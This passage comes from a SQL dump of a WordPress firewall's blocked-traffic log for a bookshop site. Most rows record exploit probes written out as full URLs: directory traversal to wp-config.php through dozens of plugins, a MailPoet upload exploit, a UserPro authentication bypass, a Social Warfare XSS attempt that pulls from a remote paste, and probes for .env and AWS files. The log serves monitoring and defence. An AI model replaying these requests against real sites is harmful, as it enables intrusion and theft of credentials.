User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"Ly5lbnYuYmFr\",\"category\":\"brute-force\",\"ssl\":1}'),(986,1629438243.986485,1629438243.542000,'\0\0\0\0\0\0\0\0\0\0��\rN+J',0,403,0,0,0,'https://ashbooks.co.uk/aws.yml',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2F3cy55bWw=\",\"category\":\"brute-force\",\"ssl\":1}'),(987,1629438236.884589,1629438235.527600,'\0\0\0\0\0\0\0\0\0\0��\rN+J',0,403,0,0,0,'https://ashbooks.co.uk/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8=\",\"category\":\"brute-force\",\"ssl\":1}'),(988,1629438233.746597,1629438233.599800,'\0\0\0\0\0\0\0\0\0\0��\rN+J',0,403,0,0,0,'https://ashbooks.co.uk/phpinfo.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3BocGluZm8ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(989,1629438232.068728,1629438230.565100,'\0\0\0\0\0\0\0\0\0\0��\rN+J',0,403,0,0,0,'https://ashbooks.co.uk/_profiler/phpinfo',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L19wcm9maWxlci9waHBpbmZv\",\"category\":\"brute-force\",\"ssl\":1}'),(990,1629457132.198376,1629457131.856200,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(991,1629457374.227039,1629457373.786600,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://ashbooks.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(992,1629457509.797051,1629457508.896700,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'python-requests/2.26.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(993,1629457544.884860,1629457544.436800,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'python-requests/2.26.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(994,1629499434.169950,1629499433.960000,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?swp_debug=load_options&swp_url=https%3A%2F%2Fhastebin.com%2Fraw%2Fetonipusij',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Social Warfare <= 3.5.2 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"136\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tzd3BfdXJsXQ==\",\"paramValue\":\"aHR0cHM6Ly9oYXN0ZWJpbi5jb20vcmF3L2V0b25pcHVzaWo=\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(995,1629499446.525548,1629499446.361800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-post.php?page=wysija_campaigns&action=themes',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','MailPoet <= 2.6.7 - Arbitrary File Upload','{\"learningMode\":0,\"failedRules\":\"65\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"bnVsbA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"file_upload\",\"ssl\":1}'),(996,1629499470.165264,1629499468.481000,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/mac-dock-gallery/macdownload.php?albid=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thbGJpZF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9tYWMtZG9jay1nYWxsZXJ5L21hY2Rvd25sb2FkLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(997,1629499467.976999,1629499467.845400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/db-backup/download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9kYi1iYWNrdXAvZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(998,1629499467.478986,1629499467.014200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9hc3Bvc2UtZG9jLWV4cG9ydGVyL2FzcG9zZV9kb2NfZXhwb3J0ZXJfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(999,1629499466.573354,1629499466.406700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twaWNd\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91bmdhbGxlcnkvc291cmNlX3Z1bG4ucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(1000,1629499466.224116,1629499465.880600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1twYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zdXBwb3J0LXBsdXMtcmVzcG9uc2l2ZS10aWNrZXQtc3lzdGVtL2luY2x1ZGVzL2FkbWluL2Rvd25sb2FkQXR0YWNobWVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(1001,1629499465.084138,1629499464.917000,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/themes/mTheme-Unus/css/css.php?files=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlc10=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL21UaGVtZS1VbnVzL2Nzcy9jc3MucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(1002,1629499464.592796,1629499464.165200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/themes/NativeChurch/download/download.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL05hdGl2ZUNodXJjaC9kb3dubG9hZC9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(1003,1629499463.887943,1629499463.460400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/themes/churchope/lib/downloadlink.php?file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvdGhlbWVzL2NodXJjaG9wZS9saWIvZG93bmxvYWRsaW5rLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(1004,1629499462.907578,1629499462.134800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tsaWJwYXRoXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zbmlwbGV0cy9tb2R1bGVzL3N5bnRheF9oaWdobGlnaHQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(1005,1629499462.841232,1629499462.719300,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmbl0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy90ZXJhLWNoYXJ0cy9jaGFydHMvdHJlZW1hcC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(1006,1629499461.454198,1629499461.322800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlcGF0aF0=\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9zaW1wbGUtaW1hZ2UtbWFuaXB1bGF0b3IvY29udHJvbGxlci9kb3dubG9hZC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(1007,1629499460.764866,1629499460.620100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/recent-backups/download-file.php?file_link=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlX2xpbmtd\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9yZWNlbnQtYmFja3Vwcy9kb3dubG9hZC1maWxlLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(1008,1629499460.509536,1629499460.055100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tteVBhdGhd\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9teWdhbGxlcnkvbXlmdW5jdGlvbnMvbXlnYWxsZXJ5YnJvd3Nlci5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(1009,1629499460.150056,1629499459.291200,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1thYnNwYXRoXQ==\",\"paramValue\":\"Li4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9taW5pLW1haWwtZGFzaGJvYXJkLXdpZGdldHdwLW1pbmktbWFpbC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(1010,1629499458.954587,1629499458.492300,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtbXAzLWF1ZGlvLXBsYXllci9kaXJlY3RfZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(1011,1629499458.120593,1629499457.368400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9jaGVycnktcGx1Z2luL2FkbWluL2ltcG9ydC1leHBvcnQvZG93bmxvYWQtY29udGVudC5waHA=\",\"category\":\"lfi\",\"ssl\":1}'),(1012,1629499457.907648,1629499457.785400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9nb29nbGUtZG9jdW1lbnQtZW1iZWRkZXIvbGlicy9wZGYucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(1013,1629499455.692676,1629499455.574700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-content/force-download.php?file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWNvbnRlbnQvZm9yY2UtZG93bmxvYWQucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(1014,1629499455.507387,1629499453.485800,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=kbslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(1015,1629499454.971810,1629499454.846600,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLnBocA==\",\"category\":\"lfi\",\"ssl\":1}'),(1016,1629499454.860558,1629499453.151400,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t0aHVtYl0=\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(1017,1629499453.895533,1629499453.736100,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpZF0=\",\"paramValue\":\"Li4vLi4vLi4vLi4vLi4vLi4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(1018,1629499453.734629,1629499452.305700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tpbWdd\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(1019,1629499451.214938,1629499450.815700,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0','blocked:waf','Directory Traversal - wp-config.php','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"lfi\",\"ssl\":1}'),(1020,1629499511.893720,1629499511.734900,'\0\0\0\0\0\0\0\0\0\0��1\"��',0,403,0,0,0,'https://ashbooks.co.uk/?up_auto_log=true',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/72.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(1021,0.000000,1629755546.387387,'\0\0\0\0\0\0\0\0\0\0��gF�M',0,302,0,1,0,'https://ashbooks.co.uk/wp-login.php','https://ashbooks.co.uk/wp-login.php?redirect_to=https%3A%2F%2Fashbooks.co.uk%2Fwp-admin%2F&reauth=1','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0','loginOK',NULL,NULL);
